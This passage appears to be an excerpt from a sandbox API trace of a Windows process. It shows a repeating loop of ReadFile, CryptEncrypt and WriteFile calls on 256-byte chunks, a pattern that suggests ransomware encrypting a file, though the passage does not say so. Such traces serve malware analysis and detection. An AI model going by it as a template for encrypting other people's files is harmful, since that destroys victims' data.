pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.262] GetLastError () returned 0x0 [0149.262] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.262] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.262] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.262] GetLastError () returned 0x0 [0149.262] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.262] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.262] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.262] GetLastError () returned 0x0 [0149.262] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.262] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.262] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.262] GetLastError () returned 0x0 [0149.262] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.262] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.262] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.262] GetLastError () returned 0x0 [0149.262] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.262] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.262] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.262] GetLastError () returned 0x0 [0149.262] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.263] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.263] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.263] GetLastError () returned 0x0 [0149.263] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.263] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.263] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.263] GetLastError () returned 0x0 [0149.263] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.263] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.263] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.263] GetLastError () returned 0x0 [0149.263] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.263] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.263] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.263] GetLastError () returned 0x0 [0149.263] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.263] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.263] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.263] GetLastError () returned 0x0 [0149.263] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.263] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.263] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.263] GetLastError () returned 0x0 [0149.263] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.263] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.264] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.264] GetLastError () returned 0x0 [0149.264] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.264] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.264] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.264] GetLastError () returned 0x0 [0149.264] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.264] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.264] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.264] GetLastError () returned 0x0 [0149.264] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.264] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.264] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.264] GetLastError () returned 0x0 [0149.264] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.264] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.264] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.264] GetLastError () returned 0x0 [0149.264] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.264] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.264] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.264] GetLastError () returned 0x0 [0149.264] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.264] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.264] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.264] GetLastError () returned 0x0 [0149.265] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.265] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.265] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.265] GetLastError () returned 0x0 [0149.265] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.265] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.265] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.265] GetLastError () returned 0x0 [0149.265] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.265] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.265] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.265] GetLastError () returned 0x0 [0149.265] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.265] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.265] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.265] GetLastError () returned 0x0 [0149.265] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.265] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.265] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.265] GetLastError () returned 0x0 [0149.265] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.265] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.265] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.265] GetLastError () returned 0x0 [0149.265] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.265] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.266] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.266] GetLastError () returned 0x0 [0149.266] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.266] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.266] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.266] GetLastError () returned 0x0 [0149.266] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.266] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.266] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.266] GetLastError () returned 0x0 [0149.266] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.266] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.266] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.266] GetLastError () returned 0x0 [0149.266] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.266] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.266] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.266] GetLastError () returned 0x0 [0149.266] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.266] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.266] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.266] GetLastError () returned 0x0 [0149.266] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.266] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.267] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.267] GetLastError () returned 0x0 [0149.267] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.267] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.267] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.267] GetLastError () returned 